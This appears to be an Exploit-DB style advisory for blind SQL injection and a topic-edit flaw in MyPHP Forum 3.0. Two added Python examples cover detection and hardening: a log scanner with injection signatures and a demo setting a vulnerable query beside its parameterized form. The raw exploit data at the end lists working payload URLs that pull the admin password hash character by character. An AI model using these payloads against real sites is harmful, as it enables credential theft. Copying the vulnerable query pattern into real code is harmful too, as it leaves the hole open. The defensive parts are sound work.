Vendor: MyPHP Forum (Final)
By: StAkeR
CVSS: 7.5 (HIGH)
Title: Blind SQL Injection and Edit Topics
CWE: 89
Product Name: MyPHP Forum (Final)
Affected Version From: 3.0 and below
Affected Version To: 3.0 and below
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Published: 2008

MyPHP Forum (Final) <= 3.0 (Edit Topics/Blind SQL Injection) Remote Vulnerabilities

MyPHP Forum (Final) version 3.0 and below is affected by blind SQL injection and by an 'Edit Topics' flaw. The SQL injection is present in the 'member.php' script, whose 'confirm', 'newconfirm', 'reqpwd' and 'post' parameters are not sanitized properly before being used in database queries; this can be exploited to manipulate those queries by injecting arbitrary SQL code. The 'post.php' script is also vulnerable to the Edit Topics issue, which can be exploited to inject arbitrary HTML and script code.
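From the defender's side, the payload shapes listed further down (a closing quote followed by OR, an ascii(substring(...)) comparison against a subquery, a trailing comment sequence) are visible in web-server access logs as long as they travel in the query string. The Python script below is an added example, not code from the advisory or from MyPHP Forum; the log lines are constructed for illustration, the script names come from the advisory, and the signature list is this example's own assumption about how those shapes look in traffic.

```python
"""Flag access-log requests to the advisory's scripts whose parameter values
carry SQL-injection markers.

Added example, not code from the advisory or from MyPHP Forum. The log lines
are constructed; the script names come from the advisory, the signatures are
this example's own assumptions about how the payload shapes appear in traffic.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Scripts the advisory names as carrying unsanitised parameters.
WATCHED_SCRIPTS = {"/member.php", "/post.php"}

# Common/combined log format, parsed up to the status code.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Checked against the percent-decoded parameter value.
SIGNATURES = {
    # closing quote followed by OR: tautology or boolean condition
    "quote_or": re.compile(r"'\s*or\b", re.IGNORECASE),
    # per-character comparison on a subquery result (blind oracle)
    "char_oracle": re.compile(r"\bascii\s*\(\s*substr(ing)?\s*\(", re.IGNORECASE),
    # an embedded SELECT ... FROM
    "subselect": re.compile(r"\bselect\b.+\bfrom\b", re.IGNORECASE | re.DOTALL),
    # comment sequence that discards the rest of the original query
    "comment_tail": re.compile(r"(--|#|/\*)\s*$"),
}

# Constructed sample: one benign request, two of the advisory's shapes, one
# hostile request to a script the advisory does not name, and a POST whose
# body (where the reqpwd field travels) is not in the access log at all.
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Oct/2008:12:00:01 +0000] "GET /member.php?action=confirm&id=a1b2c3 HTTP/1.1" 200 512',
    '203.0.113.7 - - [30/Oct/2008:12:00:02 +0000] "GET /member.php?action=confirm&id=%27%20or%20ascii(substring((select%20password%20from%20nb_member%20where%20uid=1),1,1))=98/* HTTP/1.1" 200 512',
    '198.51.100.9 - - [30/Oct/2008:12:00:03 +0000] "GET /post.php?action=edit&fid=1&tid=1&pid=42%27%20or%20%271=1 HTTP/1.1" 200 2048',
    '198.51.100.9 - - [30/Oct/2008:12:00:04 +0000] "GET /index.php?page=%27%20or%201=1 HTTP/1.1" 200 100',
    '192.0.2.5 - - [30/Oct/2008:12:00:05 +0000] "POST /member.php?action=reqpwd HTTP/1.1" 200 300',
]


def scan_line(line):
    """Return a list of findings for one access-log line (empty if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    if parts.path not in WATCHED_SCRIPTS:
        return []
    findings = []
    # parse_qsl percent-decodes, so %27 and %23 become the ' and # we match on.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        reasons = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
        if reasons:
            findings.append({
                "client": m.group("client"),
                "time": m.group("ts"),
                "script": parts.path,
                "param": name,
                "value": value,
                "reasons": reasons,
            })
    return findings


def scan_log(lines):
    """Scan an iterable of log lines and return every finding."""
    return [f for line in lines for f in scan_line(line)]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['script']} {f['param']}="
              f"{f['value']!r} -> {', '.join(f['reasons'])}")
```

Match on the decoded value, as here, rather than grepping the raw line: `%27` and `%23` hide the quote and comment characters from a plain string search. The 'reqpwd' case on this page is typed into a form field, so it travels in the POST body and never reaches a standard access log; catching it needs request-body logging or an inline filter in front of the application.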

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also be configured to use a least-privileged account with limited access to the database.
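The mitigation above amounts to two changes in how the scripts talk to the database: never splice a request parameter into the SQL text (bind it as a query parameter instead), and reject values that do not match the expected shape before they reach the query. The Python/sqlite3 example below is added here and is not MyPHP Forum's code (the forum is PHP against MySQL); it borrows only the 'nb_member' table name from the advisory, and the columns, rows, hostile input and the alphanumeric confirm-id format are constructed assumptions.

```python
"""Vulnerable string-built query beside its parameterized, validated form.

Added example, not MyPHP Forum's code (the forum is PHP against MySQL); it
uses Python's sqlite3 so it runs offline. Only the table name 'nb_member'
comes from the advisory; columns, rows and the confirm-id format are
constructed assumptions.
"""
import re
import sqlite3

# Constructed hostile value of the shape the advisory shows: a closing quote
# followed by an always-true OR condition.
INJECTED_INPUT = "' OR '1'='1"

# Assumption: a confirmation code is a short alphanumeric token.
CONFIRM_ID_RE = re.compile(r"[A-Za-z0-9]{6,32}")


def build_db():
    """Create an in-memory stand-in for the forum's member table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE nb_member (uid INTEGER PRIMARY KEY, username TEXT,"
        " password TEXT, confirm_id TEXT)"
    )
    conn.executemany(
        "INSERT INTO nb_member VALUES (?, ?, ?, ?)",
        [(1, "admin", "<hash-1>", "a1b2c3"), (2, "alice", "<hash-2>", "d4e5f6")],
    )
    return conn


def confirm_vulnerable(conn, confirm_id):
    """The pattern the advisory describes: the request parameter becomes part
    of the SQL text, so a quote in it changes the meaning of the query."""
    sql = ("SELECT uid FROM nb_member WHERE confirm_id = '" + confirm_id
           + "' ORDER BY uid")
    return [row[0] for row in conn.execute(sql)]


def confirm_safe(conn, confirm_id):
    """Hardened form: the value is bound as a parameter and can only ever be
    compared as a single string literal, whatever characters it contains."""
    sql = "SELECT uid FROM nb_member WHERE confirm_id = ? ORDER BY uid"
    return [row[0] for row in conn.execute(sql, (confirm_id,))]


def is_valid_confirm_id(value):
    """Allow-list check applied before the query: anything that is not a
    plain alphanumeric token is rejected."""
    return isinstance(value, str) and CONFIRM_ID_RE.fullmatch(value) is not None


def confirm_hardened(conn, confirm_id):
    """Validation first, then the parameterized query."""
    if not is_valid_confirm_id(confirm_id):
        raise ValueError("malformed confirmation id")
    return confirm_safe(conn, confirm_id)


def demo():
    """Run both versions against a legitimate value and the hostile one."""
    conn = build_db()
    return {
        "vulnerable/legit": confirm_vulnerable(conn, "a1b2c3"),
        "vulnerable/injected": confirm_vulnerable(conn, INJECTED_INPUT),
        "safe/legit": confirm_safe(conn, "a1b2c3"),
        "safe/injected": confirm_safe(conn, INJECTED_INPUT),
        "validation/injected": is_valid_confirm_id(INJECTED_INPUT),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:22} -> {result}")
```

The string-built query returns every member for the hostile input because the quote closes the literal and the OR condition is always true; the parameterized query returns nothing because the database receives the whole string as one value to compare against confirm_id. The least-privilege half of the mitigation is enforced at the database rather than in code: the account the forum connects with should be granted only the operations it needs on its own schema, so that even a successful injection cannot read other databases or change grants.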

Exploit-DB raw data:

/*
    -----------------------------------------------------------------------------------
    MyPHP Forum (Final) <= 3.0 (Edit Topics/Blind SQL Injection) Remote Vulnerabilities
    -----------------------------------------------------------------------------------
    Discovered By StAkeR[at]hotmail[dot]it
    Download On http://www.myphp.ws/

   - member.php (confirm - Blind SQL Injection)
   - member.php?action=confirm&id=' or ascii(substring((select password from nb_member where uid=1),1,1))=98/* 
 
   - member.php (newconfirm - Blind SQL Injection)
   - member.php?action=newconfirm&user=' or ascii(substring((select password from nb_member where uid=1),1,1))=98--
    
   - member.php?action=reqpwd  (reqpwd - Blind SQL Injection)
   - insert  ' or ascii(substring((select password from nb_member where uid=1),1,1))=98#
    
   - post.php (post Blind SQL Injection)
   - post.php?action=post&fid=1&tid=1&quote=' or ascii(substring((select password from nb_member where uid=1),1,1))=9%23
    
   - post.php (edit - Edit Topics)
   - post.php?action=edit&fid=1&tid=1&pid=[id topic] ' or '1=1

*/

# milw0rm.com [2008-10-30]